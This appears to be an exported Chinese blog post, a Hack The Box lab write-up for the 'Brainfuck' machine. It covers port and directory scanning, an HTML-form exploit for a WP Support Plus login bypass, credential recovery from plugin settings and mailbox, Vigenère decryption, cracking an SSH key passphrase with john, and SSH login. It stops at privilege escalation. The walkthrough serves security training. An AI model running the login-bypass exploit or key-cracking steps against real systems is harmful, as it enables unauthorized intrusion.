{"id":91,"date":"2024-11-13T09:04:28","date_gmt":"2024-11-13T01:04:28","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=91"},"modified":"2024-11-13T09:52:30","modified_gmt":"2024-11-13T01:52:30","slug":"htb_machine_brainfuck","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_brainfuck\/","title":{"rendered":"HTB\u9776\u673a Brainfuck \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.17<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
\u250c\u2500\u2500(root\u327fattacker)-[\/home\/\u2026\/Documents\/vulnhub_notes\/brainfuck\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.17\nPING 10.10.10.17 (10.10.10.17) 56(84) bytes of data.\n64 bytes from 10.10.10.17: icmp_seq=1 ttl=63 time=223 ms\n64 bytes from 10.10.10.17: icmp_seq=2 ttl=63 time=226 ms\n64 bytes from 10.10.10.17: icmp_seq=3 ttl=63 time=220 ms\n64 bytes from 10.10.10.17: icmp_seq=4 ttl=63 time=219 ms\n\n--- 10.10.10.17 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3004ms\nrtt min\/avg\/max\/mdev = 219.434\/222.043\/225.847\/2.478 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u901a\u4fe1\u6b63\u5e38\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Mon Jun  3 07:28:33 2024 as: nmap -sA -p- --min-rate 2000 -oN .\/ack_result.txt 10.10.10.17\nNmap scan report for 10.10.10.17 (10.10.10.17)\nHost is up (0.22s latency).\nNot shown: 65530 filtered tcp ports (no-response)\nPORT    STATE      SERVICE\n22\/tcp  unfiltered ssh\n25\/tcp  unfiltered smtp\n110\/tcp unfiltered pop3\n143\/tcp unfiltered imap\n443\/tcp unfiltered https\n\n# Nmap done at Mon Jun  3 07:29:39 2024 -- 1 IP address (1 host up) scanned in 66.23 seconds<\/code><\/pre>\n
\u9776\u673a\u5f00\u653e\u4e865<\/code>\u4e2aTCP<\/code>\u7aef\u53e3\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Mon Jun  3 07:33:20 2024 as: nmap -sS -sV -A -p 22,25,110,143,443 -oN .\/tcp_result.txt 10.10.10.17\nNmap scan report for 10.10.10.17 (10.10.10.17)\nHost is up (0.22s latency).\n\nPORT    STATE SERVICE  VERSION\n22\/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)\n|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)\n|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)\n25\/tcp  open  smtp     Postfix smtpd\n|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n110\/tcp open  pop3     Dovecot pop3d\n|_pop3-capabilities: AUTH-RESP-CODE PIPELINING RESP-CODES CAPA USER SASL(PLAIN) TOP UIDL\n143\/tcp open  imap     Dovecot imapd\n|_imap-capabilities: have OK post-login LOGIN-REFERRALS capabilities ENABLE AUTH=PLAINA0001 ID LITERAL+ SASL-IR Pre-login more IMAP4rev1 listed IDLE\n443\/tcp open  ssl\/http nginx 1.10.0 (Ubuntu)\n| ssl-cert: Subject: commonName=brainfuck.htb\/organizationName=Brainfuck Ltd.\/stateOrProvinceName=Attica\/countryName=GR\n| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb\n| Not valid before: 2017-04-13T11:19:29\n|_Not valid after:  2027-04-11T11:19:29\n|_http-title: Welcome to nginx!\n| tls-alpn: \n|_  http\/1.1\n|_ssl-date: TLS randomness does not represent time\n|_http-server-header: nginx\/1.10.0 (Ubuntu)\n| tls-nextprotoneg: \n|_  http\/1.1\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|specialized|phone|storage-misc\nRunning (JUST GUESSING): Linux 3.X|4.X|5.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4 cpe:\/o:crestron:2_series cpe:\/o:google:android:4.0 cpe:\/o:linux:linux_kernel:5.0 cpe:\/h:hp:p2000_g3\nAggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 - 4.6 (90%), Linux 3.2 - 4.9 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Linux 4.8 (90%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host:  brainfuck; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 143\/tcp)\nHOP RTT       ADDRESS\n1   219.29 ms 10.10.14.1 (10.10.14.1)\n2   219.32 ms 10.10.10.17 (10.10.10.17)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Mon Jun  3 07:34:23 2024 -- 1 IP address (1 host up) scanned in 62.32 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Mon Jun  3 07:36:46 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_port.txt 10.10.10.17\nNmap scan report for 10.10.10.17 (10.10.10.17)\nHost is up (0.22s latency).\nNot shown: 65532 open|filtered udp ports (no-response)\nPORT    STATE  SERVICE\n110\/udp closed pop3\n143\/udp closed imap\n443\/udp closed https\n\n# Nmap done at Mon Jun  3 07:37:53 2024 -- 1 IP address (1 host up) scanned in 67.37 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\u7aef\u53e3\u5f00\u653e\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aUbuntu Linux<\/code>\uff0c\u5185\u6838\u7248\u672c\u5927\u81f4\u4e3aLinux 3.10 - 4.11<\/code>\uff0c\u4e24\u4e2a\u5b50\u57df\u540dwww.brainfuck.htb<\/code>\u548csup3rs3cr3t.brainfuck.htb<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fattacker)-[\/home\/hacker\/Documents\/vulnhub_notes\/brainfuck]\n\u2514\u2500# nc -nv 10.10.10.17 22                                      \n(UNKNOWN) [10.10.10.17] 22 (ssh) open\nSSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1<\/code><\/pre>\n
\u53d1\u73b0\u9776\u673a\u53ea\u5141\u8bb8\u4f7f\u7528\u79c1\u94a5\u767b\u5f55\u3002<\/p>\n
SMTP\u670d\u52a1\uff0825\u7aef\u53e3\uff09<\/h2>\n
\u5c1d\u8bd5\u767b\u5f55\u9776\u673aSMTP<\/code>\u670d\u52a1\uff0c\u53d1\u73b0\u90ae\u4ef6\u670d\u52a1\u767b\u5f55\u529f\u80fd\u88ab\u5173\u95ed\uff1a<\/p>\n
\"\"<\/p>\n
\u5c1d\u8bd5\u6267\u884c\u626b\u63cf\u5230\u7684brainfuck<\/code>\u547d\u4ee4\uff0c\u53d1\u73b0\u8be5\u547d\u4ee4\u4e0d\u5b58\u5728\uff1b\u540c\u65f6\u53d1\u73b0\u65e0\u6cd5\u4f7f\u7528smtp-enum-user<\/code>\u5de5\u5177\u679a\u4e3e\u90ae\u4ef6\u7528\u6237\u540d\u3002<\/p>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff08443\u7aef\u53e3\uff09<\/h2>\n
\u5c06brainfuck.htb<\/code>\u3001www.brainfuck.htb<\/code>\u3001sup3rs3cr3t.brainfuck.htb<\/code>\u4e09\u4e2a\u57df\u540d\u6dfb\u52a0\u5230\/etc\/hosts<\/code>\u4e2d\u3002<\/p>\n
\u4e3b\u7ad9\u4fe1\u606f\u6536\u96c6<\/h3>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttps:\/\/www.brainfuck.htb<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u662fWordPress<\/code>\u7ad9\u70b9\uff0c\u4e3b\u9875\u4e0a\u53ea\u6709\u4e00\u5219\u5e16\u5b50\uff0c\u63d0\u793a\u8ba9\u6211\u4eec\u767b\u5f55orestis<\/code>\u7528\u6237\u7684\u90ae\u7bb1\u3002<\/p>\n
\u540c\u65f6\u53d1\u73b0Open Ticket<\/code>\u9875\u9762\u4e3a\u7a7a\u3002<\/p>\n
Sample Page<\/code>\u9875\u9762\u5982\u4e0b\uff1a<\/p>\n
\"\"<\/p>\n
\u5c06\u9875\u9762\u4e0a\u7684\u4fe1\u606f\u5236\u4f5c\u6210\u793e\u5de5\u5b57\u5178\u3002<\/p>\n
\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Mon Jun  3 08:24:40 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u https:\/\/brainfuck.htb\/ -x 400,403,404 -t 60\n\n301     0B   https:\/\/brainfuck.htb\/index.php    -> REDIRECTS TO: https:\/\/brainfuck.htb\/\n200    19KB  https:\/\/brainfuck.htb\/license.txt\n200     7KB  https:\/\/brainfuck.htb\/readme.html\n301   194B   https:\/\/brainfuck.htb\/wp-admin    -> REDIRECTS TO: https:\/\/brainfuck.htb\/wp-admin\/\n200     1KB  https:\/\/brainfuck.htb\/wp-admin\/install.php\n500     4KB  https:\/\/brainfuck.htb\/wp-admin\/setup-config.php\n301   194B   https:\/\/brainfuck.htb\/wp-content    -> REDIRECTS TO: https:\/\/brainfuck.htb\/wp-content\/\n200     0B   https:\/\/brainfuck.htb\/wp-content\/\n200     1B   https:\/\/brainfuck.htb\/wp-admin\/admin-ajax.php\n200     0B   https:\/\/brainfuck.htb\/wp-config.php\n500     0B   https:\/\/brainfuck.htb\/wp-content\/plugins\/hello.php\n200    69B   https:\/\/brainfuck.htb\/wp-content\/plugins\/akismet\/akismet.php\n302     0B   https:\/\/brainfuck.htb\/wp-signup.php    -> REDIRECTS TO: https:\/\/brainfuck.htb\/wp-login.php?action=register\n301   194B   https:\/\/brainfuck.htb\/wp-includes    -> REDIRECTS TO: https:\/\/brainfuck.htb\/wp-includes\/\n500     0B   https:\/\/brainfuck.htb\/wp-includes\/rss-functions.php\n200     0B   https:\/\/brainfuck.htb\/wp-cron.php\n200     2KB  https:\/\/brainfuck.htb\/wp-login.php\n405    42B   https:\/\/brainfuck.htb\/xmlrpc.php\n302     0B   https:\/\/brainfuck.htb\/wp-admin\/    -> REDIRECTS TO: https:\/\/brainfuck.htb\/wp-login.php?redirect_to=https%3A%2F%2Fbrainfuck.htb%2Fwp-admin%2F&reauth=1<\/code><\/pre>\n
\u4f9d\u6b21\u8bbf\u95ee\u4ee5\u4e0a\u626b\u63cf\u51fa\u7684\u76ee\u5f55\uff0c\u53d1\u73b0\/wp-content\/plugins<\/code>\u76ee\u5f55\u5141\u8bb8\u76ee\u5f55\u5217\u8868\uff1a<\/p>\n
\"\"<\/p>\n
\u4f7f\u7528WPScan<\/code>\u5de5\u5177\u626b\u63cf\uff1a<\/p>\n
wpscan --url https:\/\/brainfuck.htb\/ --enumerate u,vt,ap --disable-tls-checks<\/code><\/pre>\n
\u53d1\u73b0\u4e86\u4e24\u4e2a\u7528\u6237<\/strong>admin<\/code>\u3001<\/strong>administrator<\/code>\uff0c\u4e00\u4e2a\u4f7f\u7528\u4e2d\u7684\u4e3b\u9898<\/strong>proficient<\/code>\u548c4\u4e2a\u63d2\u4ef6<\/strong>easy-wp-smtp<\/code>\u3001<\/strong>akismet<\/code>\u548c<\/strong>wp-support-plus-responsive-ticket-system<\/code>\u3002<\/strong><\/p>\n
\u5c1d\u8bd5\u63a5\u5165API Token<\/code>\u8fdb\u884c\u6f0f\u6d1e\u626b\u63cf\uff1a<\/p>\n
wpscan --url https:\/\/brainfuck.htb\/ --enumerate p --disable-tls-checks --api-token \"**********\"<\/code><\/pre>\n
\u53d1\u73b0WP Support Plus Responsive Ticket System<\/code>\u63d2\u4ef6\u5b58\u5728\u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e\uff1a<\/p>\n
\"\"<\/p>\n
\u5176\u5b83\u6f0f\u6d1e\u5168\u90e8\u9700\u8981\u767b\u5f55\u540e\u5229\u7528\u3002<\/p>\n
\u7ffb\u770b\/wp-content\/plugins\/easy-wp-smtp<\/code>\u76ee\u5f55\uff0c\u53d1\u73b0\u56fe\u7247screenshot-1.jpg<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u65c1\u7ad9\u4fe1\u606f\u6536\u96c6<\/h3>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttps:\/\/sup3rs3cr3t.brainfuck.htb<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u662f\u4e00\u4e2a\u8bba\u575b\u7cfb\u7edf\uff0c\u53ea\u6709\u4e00\u5219\u5e16\u5b50\uff1a<\/p>\n
admin: test\norestis: Hello!<\/code><\/pre>\n
\u540c\u65f6\u4e3b\u9875\u4e0a\u8fd8\u63d0\u793a\u9700\u8981\u7528\u6237\u4f7f\u7528\u81ea\u5df1\u7684\u52a0\u5bc6\u65b9\u5f0f\u5904\u7406\u6d89\u5bc6\u6750\u6599\u3002<\/p>\n
\u5c1d\u8bd5\u6ce8\u518c\u4e00\u4e2a\u65b0\u7528\u6237\uff0c\u53d1\u73b0\u9700\u8981\u90ae\u4ef6\u6821\u9a8c\uff0c\u800c\u9776\u673a\u65e0\u6cd5\u53d1\u51fa\u90ae\u4ef6\uff1a<\/p>\n
\"\"<\/p>\n
\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Mon Jun  3 09:26:10 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u https:\/\/sup3rs3cr3t.brainfuck.htb\/ -x 400,403,404 -t 60 -e php,js,html,txt,zip,tar.gz,pcap,aspx\n\n200   354B   https:\/\/sup3rs3cr3t.brainfuck.htb\/.editorconfig\n200     4KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/.htaccess\n301   194B   https:\/\/sup3rs3cr3t.brainfuck.htb\/assets    -> REDIRECTS TO: https:\/\/sup3rs3cr3t.brainfuck.htb\/assets\/\n200     2KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/composer.json\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/config.php\n200   160KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/composer.lock\n200     5KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/CONTRIBUTING.md\n200     1KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/LICENSE\n500     4KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/login\n302     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/logout    -> REDIRECTS TO: https:\/\/sup3rs3cr3t.brainfuck.htb\n200   104B   https:\/\/sup3rs3cr3t.brainfuck.htb\/Procfile\n200     1KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/readme.md\n500     4KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/register\n500     4KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/reset\n301   194B   https:\/\/sup3rs3cr3t.brainfuck.htb\/scripts    -> REDIRECTS TO: https:\/\/sup3rs3cr3t.brainfuck.htb\/scripts\/\n301   194B   https:\/\/sup3rs3cr3t.brainfuck.htb\/storage    -> REDIRECTS TO: https:\/\/sup3rs3cr3t.brainfuck.htb\/storage\/\n200     5KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/tags\n301   194B   https:\/\/sup3rs3cr3t.brainfuck.htb\/uploads    -> REDIRECTS TO: https:\/\/sup3rs3cr3t.brainfuck.htb\/uploads\/\n200    11KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/Vagrantfile\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/autoload_namespaces.php\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/ClassLoader.php\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/autoload.php\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/autoload_files.php\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/autoload_real.php\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/autoload_classmap.php\n200     0B   https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/autoload_psr4.php\n200    20KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/LICENSE\n200   148KB  https:\/\/sup3rs3cr3t.brainfuck.htb\/vendor\/composer\/installed.json<\/code><\/pre>\n
\u8bbf\u95ee\/Vagrantfile<\/code>\u6587\u4ef6\uff0c\u53d1\u73b0\u76ee\u6807\u7cfb\u7edf\u4e3aFlarum<\/code>\u8bba\u575b\u7cfb\u7edf\uff0c\u4ee5\u53caMySQL<\/code>\u6570\u636e\u5e93root<\/code>\u7528\u6237\u7684\u5bc6\u7801\u53ef\u80fd\u4e3aroot<\/code>\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e\u5229\u7528<\/h2>\n
WP Support Plus Responsive Ticket System <= 8.0.0<\/code>\u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e\u7684EXP<\/code>\u4e3a\uff1a<\/p>\n
<form method=\"post\" action=\"https:\/\/brainfuck.htb\/wp-admin\/admin-ajax.php\">\n    Username: <input type=\"text\" name=\"username\" value=\"admin\">\n    <input type=\"hidden\" name=\"email\" value=\"sth\">\n    <input type=\"hidden\" name=\"action\" value=\"loginGuestFacebook\">\n    <input type=\"submit\" value=\"Login\">\n<\/form><\/code><\/pre>\n
\u76f4\u63a5\u4fdd\u5b58\u4e3aexp.html<\/code>\u6587\u4ef6\uff0c\u4f7f\u7528\u6d4f\u89c8\u5668\u6253\u5f00\uff0c\u70b9\u51fb\u767b\u5f55\u6309\u94ae\uff0c\u518d\u8bbf\u95ee\u7ba1\u7406\u540e\u53f0\uff1a<\/p>\n
\"\"<\/p>\n
\u767b\u5f55\u90ae\u4ef6\u7cfb\u7edf<\/h2>\n
\u767b\u5f55\u540e\uff0c\u6839\u636eWordPress<\/code>\u4e3b\u9875\u4e0a\u7684\u63d0\u793a\uff0c\u5c1d\u8bd5\u5728Easy WP Smtp<\/code>\u63d2\u4ef6\u7684\u914d\u7f6e\u4e2d\u5bfb\u627eorestis<\/code>\u7528\u6237\u7684\u5bc6\u7801\uff1a<\/p>\n
\"\"<\/p>\n
\u5728\u9875\u9762\u5e95\u90e8\u627e\u5230SMTP<\/code>\u670d\u52a1\u7684\u767b\u5f55\u51ed\u636e\uff0c\u901a\u8fc7\u5143\u7d20\u5ba1\u67e5\u5de5\u5177\u66f4\u6539SMTP Password<\/code>\u8f93\u5165\u6846\u7684\u5c5e\u6027\u4e3atext<\/code>\uff0c\u6210\u529f\u53d1\u73b0\u5bc6\u7801\uff1a<\/p>\n
\"\"<\/p>\n
    \n
  • \u7528\u6237\u540d\uff1a<\/strong>orestis<\/code><\/li>\n
  • \u5bc6\u7801\uff1a<\/strong>kHGuERB29DNiNE<\/code><\/li>\n<\/ul>\n
    \u7531\u4e8e\u65e0\u6cd5\u767b\u5f55SMTP<\/code>\u670d\u52a1\uff0c\u5c1d\u8bd5\u767b\u5f55POP3<\/code>\u670d\u52a1\uff1a<\/p>\n
    \"\"<\/p>\n
    \u53d1\u73b0\u4e24\u5c01\u90ae\u4ef6\uff1a<\/p>\n
    =============== New WordPress Site (From: wordpress)\nYour new WordPress site has been successfully set up at:\n\nhttps:\/\/brainfuck.htb\n\nYou can log in to the administrator account with the following information:\n\nUsername: admin\nPassword: The password you chose during the install.\nLog in here: https:\/\/brainfuck.htb\/wp-login.php\n\nWe hope you enjoy your new site. Thanks!\n\n--The WordPress Team\nhttps:\/\/wordpress.org\/\n===============\n\n=============== Forum Access Details (From: root)\nHi there, your credentials for our \"secret\" forum are below \ud83d\ude42\n\nusername: orestis\npassword: kIEnnfEKJ#9UmdO\n\nRegards\n===============<\/code><\/pre>\n
    \u6210\u529f\u53d1\u73b0\u6d89\u5bc6\u8bba\u575b\u7684\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n
      \n
    • \u7528\u6237\u540d\uff1a<\/strong>orestis<\/code><\/li>\n
    • \u5bc6\u7801\uff1a<\/strong>kIEnnfEKJ#9UmdO<\/code><\/li>\n<\/ul>\n
      \u76f4\u63a5\u767b\u5f55sup3rs3cr3t.brainfuck.htb<\/code>\uff1a<\/p>\n
      \"\"<\/p>\n
      \u6210\u529f\u53d1\u73b0\u9690\u85cf\u5e16\u5b50Key<\/code>\u548cSSH Access<\/code>\u3002<\/p>\n
      \u4ed4\u7ec6\u89c2\u5bdf\u4e24\u5219\u5e16\u5b50\u4e2d\u7684\u5185\u5bb9\uff0c\u53d1\u73b0\u5e16\u5b50SSH Access<\/code>\u4e2dorestis<\/code>\u7684\u7b2c\u4e00\u6b21\u53d1\u8a00\u5185\u5bb9\u4f3c\u4e4e\u662f\u5e16\u5b50Key<\/code>\u7b2c\u4e00\u5219\u5185\u5bb9\u7684\u52a0\u5bc6\u7248\u672c\uff08\u4e24\u6bb5\u5185\u5bb9\u5177\u6709\u76f8\u540c\u7684\u683c\u5f0f\uff09\uff1a<\/p>\n
      \"\"<\/p>\n
      \u5c1d\u8bd5\u5c06\u5bc6\u6587\u4e2d\u7684\u975e\u82f1\u6587\u5b57\u7b26\u53bb\u9664\uff0c\u4f7f\u7528\u5728\u7ebf\u5de5\u5177\u8bc6\u522b\u5176\u52a0\u5bc6\u65b9\u5f0f\uff1a<\/p>\n
      \"\"<\/p>\n
      \u5728\u7ed3\u679c\u4e2d\u9996\u5f53\u5176\u51b2\u7684\u662f\u201c\u7ef4\u5409\u5c3c\u4e9a\u5bc6\u6587\u201d\u3002<\/p>\n
      \u4e0a\u7f51\u67e5\u9605\u76f8\u5173\u8d44\u6599\uff0c\u53d1\u73b0\u5728\u5177\u6709\u660e\u6587\u548c\u5bc6\u6587\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u4f7f\u7528One-Time Pad<\/code>\u5728\u7ebf\u89e3\u5bc6\u5668\u627e\u51fa\u7528\u4e8e\u52a0\u5bc6\u7684\u5bc6\u94a5\uff1a<\/p>\n
      \"\"<\/p>\n
      \u5bc6\u94a5\u4e3a\uff1a<\/strong>fuckmybrain<\/code>\u3002<\/strong><\/p>\n
      \u4f7f\u7528\u8be5\u5bc6\u94a5\u89e3\u5bc6Key<\/code>\u8ba8\u8bba\u5e16\u4e2d\u7591\u4f3c\u52a0\u5bc6\u7f51\u5740\u7684\u6587\u672c\uff1a<\/p>\n
      \"\"<\/p>\n
      \u53d1\u73b0\u6d89\u5bc6\u7f51\u5740\uff1ahttps:\/\/brainfuck.htb\/8ba5aa10e915218697d1c658cdee0bb8\/orestis\/id_rsa<\/code>\u3002<\/p>\n
      \u76f4\u63a5\u4e0b\u8f7d\uff0c\u53d1\u73b0\u4e3a\u4e00\u4e2a\u52a0\u5bc6\u7684SSH<\/code>\u79c1\u94a5\uff1a<\/p>\n
      -----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,6904FEF19397786F75BE2D7762AE7382\n\nmneag\/YCY8AB+OLdrgtyKqnrdTHwmpWGTNW9pfhHsNz8CfGdAxgchUaHeoTj\/rh\/\nB2nS4+9CYBK8IR3Vt5Fo7PoWBCjAAwWYlx+cK0w1DXqa3A+BLlsSI0Kws9jea6Gi\nW1ma\/V7WoJJ+V4JNI7ufThQyOEUO76PlYNRM9UEF8MANQmJK37Md9Ezu53wJpUqZ\n7dKcg6AM\/o9VhOlpiX7SINT9dRKaKevOjopRbyEFMliP01H7ZlahWPdRRmfCXSmQ\nzxH9I2lGIQTtRRA3rFktLpNedNPuZQCSswUec7eVVt2mc2Zv9PM9lCTJuRSzzVum\noz3XEnhaGmP1jmMoVBWiD+2RrnL6wnz9kssV+tgCV0mD97WS+1ydWEPeCph06Mem\ndLR2L1uvBGJev8i9hP3thp1owvM8HgidyfMC2vOBvXbcAA3bDKvR4jsz2obf5AF+\nFvt6pmMuix8hbipP112Us54yTv\/hyC+M5g1hWUuj5y4xovgr0LLfI2pGe+Fv5lXT\nmcznc1ZqDY5lrlmWzTvsW7h7rm9LKgEiHn9gGgqiOlRKn5FUl+DlfaAMHWiYUKYs\nLSMVvDI6w88gZb102KD2k4NV0P6OdXICJAMEa1mSOk\/LS\/mLO4e0N3wEX+NtgVbq\nul9guSlobasIX5DkAcY+ER3j+\/YefpyEnYs+\/tfTT1oM+BR3TVSlJcOrvNmrIy59\nkrKVtulxAejVQzxImWOUDYC947TXu9BAsh0MLoKtpIRL3Hcbu+vi9L5nn5LkhO\/V\ngdMyOyATor7Amu2xb93OO55XKkB1liw2rlWg6sBpXM1WUgoMQW50Keo6O0jzeGfA\nVwmM72XbaugmhKW25q\/46\/yL4VMKuDyHL5Hc+Ov5v3bQ908p+Urf04dpvj9SjBzn\nschqozogcC1UfJcCm6cl+967GFBa3rD5YDp3x2xyIV9SQdwGvH0ZIcp0dKKkMVZt\nUX8hTqv1ROR4Ck8G1zM6Wc4QqH6DUqGi3tr7nYwy7wx1JJ6WRhpyWdL+su8f96Kn\nF7gwZLtVP87d8R3uAERZnxFO9MuOZU2+PEnDXdSCSMv3qX9FvPYY3OPKbsxiAy+M\nwZezLNip80XmcVJwGUYsdn+iB\/UPMddX12J30YUbtw\/R34TQiRFUhWLTFrmOaLab\nIql5L+0JEbeZ9O56DaXFqP3gXhMx8xBKUQax2exoTreoxCI57axBQBqThEg\/HTCy\nIQPmHW36mxtc+IlMDExdLHWD7mnNuIdShiAR6bXYYSM3E725fzLE1MFu45VkHDiF\nmxy9EVQ+v49kg4yFwUNPPbsOppKc7gJWpS1Y\/i+rDKg8ZNV3TIb5TAqIqQRgZqpP\nCvfPRpmLURQnvly89XX97JGJRSGJhbACqUMZnfwFpxZ8aPsVwsoXRyuub43a7GtF\n9DiyCbhGuF2zYcmKjR5EOOT7HsgqQIcAOMIW55q2FJpqH1+PU8eIfFzkhUY0qoGS\nEBFkZuCPyujYOTyvQZewyd+ax73HOI7ZHoy8CxDkjSbIXyALyAa7Ip3agdtOPnmi\n6hD+jxvbpxFg8igdtZlh9PsfIgkNZK8RqnPymAPCyvRm8c7vZFH4SwQgD5FXTwGQ\n-----END RSA PRIVATE KEY-----<\/code><\/pre>\n
      \u540c\u65f6\u89e3\u5bc6\u4e86\u6d89\u5bc6\u8bba\u575b\u8ba8\u8bba\u5e16Key<\/code>\u4e2d\u7684\u6240\u6709\u52a0\u5bc6\u804a\u5929\uff1a<\/p>\n
      =============== (From: orestis)\nHey give me the url for my key bitch :)\n\nOrestis - Hacking for fun and profit\n=============== (From: admin)\nSay please and i just might do so...\n=============== (From: orestis)\nPleeeease....\n\nOrestis - Hacking for fun and profit\n=============== (From: admin)\nThere you go you stupid fuck, I hope you remember your key password because I dont :)\n\nhttps:\/\/brainfuck.htb\/8ba5aa10e915218697d1c658cdee0bb8\/orestis\/id_rsa\n=============== (From: orestis)\nNo problem, I'll brute force it ;)\n\nOrestis - Hacking for fun and profit\n===============<\/code><\/pre>\n
      \u6839\u636e\u7ed9\u51fa\u7684\u63d0\u793a\uff0c\u5c1d\u8bd5\u4f7f\u7528John<\/code>\u5de5\u5177\u7206\u7834\u5bc6\u7801\uff1a<\/p>\n
      ssh2john .\/id_rsa > .\/hash_sshkey.txt\njohn .\/hash_sshkey.txt --wordlist=$WORDLIST_PATH\/rockyou.txt<\/code><\/pre>\n
      \"\"<\/p>\n
      \u6210\u529f\u7206\u7834<\/strong>SSH<\/code>\u79c1\u94a5\u5bc6\u7801\uff1a<\/strong>3poulakia!<\/code>\u3002<\/strong><\/p>\n
      \u76f4\u63a5\u4ee5orestis<\/code>\u7528\u6237\u8eab\u4efd\u767b\u5f55\uff1a<\/p>\n
      \"\"<\/p>\n
      \u6210\u529f\uff01\uff01<\/strong><\/p>\n
      \n
      \u6743\u9650\u63d0\u5347<\/h1>\n
      \u672c\u5730\u4fe1\u606f\u6536\u96c6<\/h2>\n
